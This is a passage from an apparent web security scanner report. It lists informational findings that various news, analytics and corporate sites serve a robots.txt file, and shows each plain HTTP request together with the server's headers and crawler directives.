Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "1de885-131-48f142a249100"
Accept-Ranges: bytes
Content-Length: 305
Connection: close
Content-Type: text/plain; charset=UTF-8

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/delivery/). This file is required in the
# event that you us
...[SNIP]...
31.11. http://ehg-findlaw.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-findlaw.hitbox.com
Path:   /HG

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ehg-findlaw.hitbox.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:09:39 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Thu, 12 May 2011 17:09:39 GMT
Content-Type: text/plain
Content-Length: 36

User-agent: *
Disallow: /Diagnostic
31.12. http://feeds.bbci.co.uk/news/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /news/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 24 Feb 2011 17:32:01 GMT
Server: Apache
Content-Length: 464
Content-Type: text/plain
Cache-Control: max-age=3484
Expires: Thu, 12 May 2011 18:13:52 GMT
Date: Thu, 12 May 2011 17:15:48 GMT
Connection: close

User-agent: *
Disallow: /cgi-bin
Disallow: /cgi-perl
Disallow: /lexaurus
Disallow: /mpapps
Disallow: /mpsearch
Disallow: /mtk
Disallow: /weatherbeta
Disallow: /weather/hi/about/newsid_7760000/7
...[SNIP]...
31.13. http://gigablast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gigablast.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gigablast.com

Response

HTTP/1.1 200 OK
Content-Length: 156
Content-Type: text/plain
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:14:01 GMT
Last-Modified: Thu, 02 Oct 2008 01:41:24 GMT

User-agent: *
Disallow: /cgi/
Disallow: /search?
Disallow: /get
Disallow: /addurl?
Disallow: /contact.html
Disallow: /master
Disallow: /admin
Disallow: /Top
31.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Thu, 12 May 2011 19:54:11 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /
31.15. http://image.exct.net/aec5805b-4.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image.exct.net
Path:   /aec5805b-4.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: image.exct.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "bbbcde0b15cabd06aace1df82d335978:1231256306"
Last-Modified: Tue, 06 Jan 2009 15:38:26 GMT
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
NsLocation: a248.e.akamai.net/L/248/40988/1d/exactarget13.download.akamai.com/40787/r/o/b/o/t/-robots.txt
Date: Thu, 12 May 2011 18:08:51 GMT
Connection: close

User-agent: *
Disallow: /
31.16. http://imagesrv.gartner.com/css/TabbedPanels.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imagesrv.gartner.com
Path:   /css/TabbedPanels.css

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: imagesrv.gartner.com

Response

HTTP/1.1 200 OK
Connection: close
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 17 Nov 2009 16:20:54 GMT
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 20:18:56 GMT
Content-Length: 28
ETag: "pv229a129254fba06744e094564b00c322"
X-PvInfo: [S10232.C165520.A165348.RA165306.G2868D.U2A1BF8DA].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes

User-agent: *
Disallow: /
31.17. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 11:30:25 GMT
ETag: "cc0d3a-1b-4a1f8e226d640"
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 16:03:19 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

31.18. http://m.perkinscoie.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://m.perkinscoie.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: m.perkinscoie.com

Response

HTTP/1.1 200 OK
Content-Length: 706
Content-Type: text/plain
Last-Modified: Mon, 21 Jun 2010 18:12:27 GMT
Accept-Ranges: bytes
ETag: "8eeb3e4e6d11cb1:afa4"
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
x-geoloc: 02
x-client: 000881
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-HUBRD-A67
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:46:20 GMT
Connection: close
Set-Cookie: NSC_MC_QbvmXfjtt_IUUQ=ffffffff09d5f65f45525d5f4f58455e445a4a423660;path=/

# STANDARD
User-agent: *
Disallow: /fc/
Disallow: /FirmConnect.aspx
Disallow: /Login.aspx
Disallow: /Logout.aspx
Disallow: /32/
Disallow: /1/
Disallow: /2/
Disallow: /3/
Disallow: /64/
Disa
...[SNIP]...
31.19. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Thu, 12 May 2011 17:01:21 GMT
Expires: Thu, 12 May 2011 17:01:21 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
31.20. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.gstatic.com
Path:   /intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: maps.gstatic.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 23 Aug 2010 20:46:35 GMT
Date: Thu, 12 May 2011 16:11:47 GMT
Expires: Thu, 12 May 2011 16:11:47 GMT
Cache-Control: private, max-age=31536000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
31.21. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /rss/newsonline_world_edition/front_page/rss.xml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 17 Mar 2009 16:14:11 GMT
Server: Apache
Content-Length: 26
Content-Type: text/plain
Cache-Control: max-age=84378584
Expires: Mon, 13 Jan 2014 07:45:31 GMT
Date: Thu, 12 May 2011 17:15:47 GMT
Connection: close

User-agent: *
Disallow: /
31.22. http://s7.addthis.com/js/250/addthis_widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s7.addthis.com
Path:   /js/250/addthis_widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s7.addthis.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 19 Apr 2011 11:03:18 GMT
ETag: "e01e35-1b-4a143749a6980"
Content-Type: text/plain; charset=UTF-8
Date: Fri, 13 May 2011 00:42:49 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *

31.23. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1YgDIOiIAyoHWcQAAP__ADIFVcQAAA8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEY1YgDIOiIAyoHWcQAAP__ADIFVcQAAA8

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Thu, 12 May 2011 17:00:17 GMT
Expires: Thu, 12 May 2011 17:00:17 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
31.24. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 09 May 2011 20:53:07 GMT
Date: Thu, 12 May 2011 16:59:59 GMT
Expires: Thu, 12 May 2011 16:59:59 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...
31.25. http://t2.gstatic.com/images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t2.gstatic.com
Path:   /images

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t2.gstatic.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Jun 2010 03:34:56 GMT
Date: Thu, 12 May 2011 19:03:59 GMT
Expires: Thu, 12 May 2011 19:03:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 26
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /
31.26. http://wtssdc.gartner.com/dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wtssdc.gartner.com
Path:   /dcs2kf7dq10000sddxi7bvt9i_6o7e/dcs.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: wtssdc.gartner.com

Response

HTTP/1.1 200 OK
Content-Length: 277
Content-Type: text/plain
Last-Modified: Fri, 10 Mar 2006 19:37:06 GMT
Accept-Ranges: bytes
ETag: "09d6037a44c61:b1d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 20:19:13 GMT
Connection: close

##############################
#
# WebTrends SmartSource Data Collector
# Copyright (c) 1996-2006 WebTrends Inc. All rights reserved.
# $DateTime: 2006/02/08 13:22:46 $
#
######################
...[SNIP]...
31.27. http://www.bisnow.com/new_york_commercial_real_estate_news_story.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bisnow.com
Path:   /new_york_commercial_real_estate_news_story.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bisnow.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:03 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 24 Mar 2009 13:02:15 GMT
ETag: "138804a-1ab-465dcfdf8e3c0"
Accept-Ranges: bytes
Content-Length: 427
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /
Disallow: /archives/
Disallow: /sendstudionx/
Disallow: /temp/
Disallow: /special/
Disallow: /stats/
Disallow: /test/
Disallow: /sugarcrm/
Disallow: /new/
Disallow: /old/
Disall
...[SNIP]...
31.28. http://www.bloomberg.com/apps/news  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bloomberg.com
Path:   /apps/news

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bloomberg.com

Response

HTTP/1.0 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/plain
Last-Modified: Tue, 22 Jun 2010 21:49:45 GMT
ETag: W/"d7-4c212ff9"
Cache-Control: max-age=900
Expires: Thu, 12 May 2011 17:10:02 GMT
Date: Thu, 12 May 2011 16:55:02 GMT
Content-Length: 215
Connection: close

User-agent: *
User-agent: Mediapartners-Google*
Disallow:
Sitemap: http://www.bloomberg.com/sitemap_index.xml
Sitemap: http://www.bloomberg.com/sitemap_news.xml
Sitemap: http://www.bloomberg.com/sit
...[SNIP]...
31.29. http://www.boston.com/business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.boston.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:04 GMT
Server: Apache/2.2.13 (Unix) modpath/0.4
Last-Modified: Mon, 21 Jun 2010 19:32:33 GMT
Accept-Ranges: bytes
Content-Length: 96
Served-By: connor
Keep-Alive: timeout=30
Connection: close
Content-Type: text/plain
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;

User-Agent: *
Sitemap: http://www.boston.com/Sitemap_index.xml
Disallow: /newsprojects/widgets/
31.30. http://www.capgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capgroup.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.capgroup.com

Response

HTTP/1.1 200 OK
Server: ""
Date: Thu, 12 May 2011 19:44:32 GMT
Content-length: 222
Content-type: text/plain
Set-Cookie: WEBTRENDS_ID=173.193.214.243-1305229472.299349; path=/; expires=Sun, 09-May-2021 19:44:32 GMT
Last-modified: Fri, 29 Apr 2011 17:06:43 GMT
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /careers/referral.html
Disallow: /gig/
Disallow: /HR2/
Disallow: /GIG_20/
Disallow: /_xml/
Disallow: /openpositions.nsf
Disallow: /rdir/
Disallow: /_img/
Disallow: /_p
...[SNIP]...
31.31. http://www.centrifugesystems.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.centrifugesystems.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.centrifugesystems.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 19:50:02 GMT
Server: Apache
Last-Modified: Fri, 09 Oct 2009 05:03:47 GMT
ETag: "ce8007-b0-47579814332c0"
Accept-Ranges: bytes
Content-Length: 176
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /cgi-bin/
Disallow: /includes/
Disallow: /swf/
Disallow: /generator/
Disallow: /shadowbox/
Disallow: /errordocs/
Disallow: /multibox/
31.32. http://www.chambersandpartners.com/europe/rankings36.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chambersandpartners.com
Path:   /europe/rankings36.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chambersandpartners.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 12 May 2011 16:56:11 GMT
Server: Microsoft-IIS/6.0
Cache-Control: public
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
Accept-Ranges: bytes
Cache-Control: public, max-age=31536000
Expires: Fri, 13 May 2011 16:56:11 GMT
Last-Modified: Fri, 06 Aug 2010 10:17:30 GMT
ETag: "1CB355093971900"
Vary: *
Content-Type: text/plain
Content-Length: 200

...User-agent: *
Allow: /
Disallow: /WebResource.axd
Disallow: /ScriptResource.axd
Disallow: /Secure/
Disallow: /Scripts/
Disallow: /bin/
Sitemap: http://www.chambersandpartners.com/sitemap.xml
31.33. http://www.cnbc.com/id/15840232  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cnbc.com
Path:   /id/15840232

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cnbc.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:40:12 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/plain
Via: 1.1 C aicache6
Content-Length: 305
X-Aicache-OS: 64.210.194.246:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Fri, 13 May 2011 13:40:12 GMT

# robots.txt file for www.cnbc.com

User-agent: *
Disallow: error404.aspx

Sitemap: http://www.cnbc.com/xml/SitemapIndexCNBC.xml
Sitemap: http://syndication.cnbc.com/sitemaps/sitemap_static.xml
Sitema
...[SNIP]...
31.34. http://www.dmoc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dmoc.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dmoc.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 18:08:15 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "11878bdc-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 18:08:15 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
31.35. http://www.elawmarketing.com/about/staff  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elawmarketing.com
Path:   /about/staff

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elawmarketing.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:35:20 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 31 Mar 2011 12:35:56 GMT
ETag: "119609ce-63a-49fc688e6a300"
Accept-Ranges: bytes
Content-Length: 1594
Cache-Control: max-age=1209600
Expires: Thu, 26 May 2011 16:35:20 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
31.36. http://www.elfaonline.org/pub/news/indnews/news_report.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elfaonline.org
Path:   /pub/news/indnews/news_report.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elfaonline.org

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 165
Content-Type: text/plain
Content-Location: http://www.elfaonline.org/robots.txt
Last-Modified: Fri, 30 Apr 2010 16:28:45 GMT
Accept-Ranges: bytes
ETag: "611d2f3482e8ca1:af72"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:54:59 GMT
Connection: close

User-agent: *
Disallow: /_noindex/
Disallow: /cvweb_elfa/cgi-bin/memberdll.dll/OpenPage?WRP=CompanySearch.htm
Disallow: /cvweb_elfa/cgi-bin/Registrationdll.dll/
31.37. http://www.forbes.com/feeds/ap/2009/05/26/ap6466854.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /feeds/ap/2009/05/26/ap6466854.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forbes.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 16:55:04 GMT
Server: Apache/1.3.26
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 25 Feb 2011 17:44:32 GMT
ETag: "1c342c2-97-4d67ea80"
Accept-Ranges: bytes
Content-Length: 151
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /static_html/2008/stockcharts/advancedmicrodevices.html
Disallow: /following/
Sitemap: http://www.forbes.com/sitemap_index.xml
31.38. http://www.freep.com/apps/pbcs.dll/article  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freep.com
Path:   /apps/pbcs.dll/article

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freep.com

Response

HTTP/1.0 200 OK
Content-Length: 924
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 17:24:49 GMT
Accept-Ranges: bytes
ETag: "8046922b80acc1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Date: Thu, 12 May 2011 16:55:05 GMT
Connection: close

# Robots.txt
# Be nice.
#
Sitemap: http://www.freep.com/sitemap_index.xml
Sitemap: http://www.freep.com/sitemapnews_index.xml
#
#
User-agent: MSIECrawler
Disallow: /
#
User-agent: *
Disallo
...[SNIP]...
31.39. http://www.ft.com/cms/s/0/fd2e0fcc-4a55-11de-8e7e-00144feabdc0.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ft.com
Path:   /cms/s/0/fd2e0fcc-4a55-11de-8e7e-00144feabdc0.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "215-4d9aca31"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 533
Date: Thu, 12 May 2011 16:55:30 GMT
Connection: close
Last-Modified: Tue, 05 Apr 2011 07:52:17 GMT
Server: Apache/1.3.37
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=1, max=120

User-agent: Googlebot-Mobile
Disallow: /

User-agent: Googlebot-News
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...
31.40. http://www.gartner.com/technology/home.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gartner.com
Path:   /technology/home.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Close
Last-Modified: Tue, 18 Jan 2011 21:15:30 GMT
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 20:18:53 GMT
Content-Length: 1129
ETag: "pv7cbc641ce7513b721203c2f9778ec5f5"
Expires: Sat, 14 May 2011 20:18:53 GMT
Age: 950
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10101.C10821.A158706.RA0.G26D16.U2AE07660].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=2a3ee4da5a3441d032f234184deb9f5407e653bae047730f4dcc40ad; Path=/

# robots.txt for http://www.gartner.com/    
# Updated: 18 Jan 2011    
User-agent: *
Disallow:/0_admin/PasswordRequest.jsp
Disallow:/0_admin/adm_help.jsp
Disallow:/2_events/audioconferences/
Disallow:/2_ev
...[SNIP]...
31.41. https://www.gartner.com/login/loginInitAction.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.gartner.com
Path:   /login/loginInitAction.do

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gartner.com

Response

HTTP/1.1 200 OK
Connection: Close
Last-Modified: Tue, 18 Jan 2011 21:15:30 GMT
Content-Type: text/plain; charset=UTF-8
Date: Thu, 12 May 2011 20:19:47 GMT
Content-Length: 1129
ETag: "pv7cbc641ce7513b721203c2f9778ec5f5"
Expires: Sat, 14 May 2011 20:19:47 GMT
Age: 1004
Cache-Control: public, s-maxage=3600, max-age=172800
X-PvInfo: [S10101.C10821.A158706.RA0.G26D16.U2AE07660].[OT/plaintext.OG/documents]
Vary: Accept-Encoding
Accept-Ranges: bytes
Set-Cookie: TS83f541=7c0e5258a34c683c2e40f8f134874456e47f574403261f914dcc40e3; Path=/

# robots.txt for http://www.gartner.com/    
# Updated: 18 Jan 2011    
User-agent: *
Disallow:/0_admin/PasswordRequest.jsp
Disallow:/0_admin/adm_help.jsp
Disallow:/2_events/audioconferences/
Disallow:/2_ev
...[SNIP]...
31.42. http://www.gigablast.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gigablast.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gigablast.com

Response

HTTP/1.1 200 OK
Content-Length: 156
Content-Type: text/plain
Connection: Close
Server: Gigablast/1.0
Date: Thu, 12 May 2011 15:16:02 GMT
Last-Modified: Thu, 02 Oct 2008 01:41:24 GMT

User-agent: *
Disallow: /cgi/
Disallow: /search?
Disallow: /get
Disallow: /addurl?
Disallow: /contact.html
Disallow: /master
Disallow: /admin
Disallow: /Top
31.43. http://www.glaala.org/clubportal/glaala/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.glaala.org
Path:   /clubportal/glaala/index.cfm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.glaala.org

Response

HTTP/1.1 200 OK
Content-Length: 604
Content-Type: text/plain
Content-Location: http://www.glaala.org/robots.txt
Last-Modified: Thu, 18 Sep 2008 07:00:00 GMT
Accept-Ranges: bytes
ETag: "058a62a5c19c91:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:12 GMT
Connection: close

...# /robots.txt file for http://www.memberize.com

User-agent: *
Disallow: /video/
Disallow: /clubportal/cart/
Disallow: /clubportal/library/
Disallow: /clubportal/includes/
Disallow: /clubpor
...[SNIP]...
31.44. http://www.goclubexe.com/clubportal  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.goclubexe.com
Path:   /clubportal

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.goclubexe.com

Response

HTTP/1.1 200 OK
Content-Length: 604
Content-Type: text/plain
Content-Location: http://www.goclubexe.com/robots.txt
Last-Modified: Thu, 18 Sep 2008 07:00:00 GMT
Accept-Ranges: bytes
ETag: "058a62a5c19c91:869"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 18:09:28 GMT
Connection: close

...# /robots.txt file for http://www.memberize.com

User-agent: *
Disallow: /video/
Disallow: /clubportal/cart/
Disallow: /clubportal/library/
Disallow: /clubportal/includes/
Disallow: /clubpor
...[SNIP]...
31.45. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Thu, 12 May 2011 16:02:46 GMT
Expires: Thu, 12 May 2011 16:02:46 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js
31.46. http://www.google.com/search  previous  next

Summary

Severity:   Information
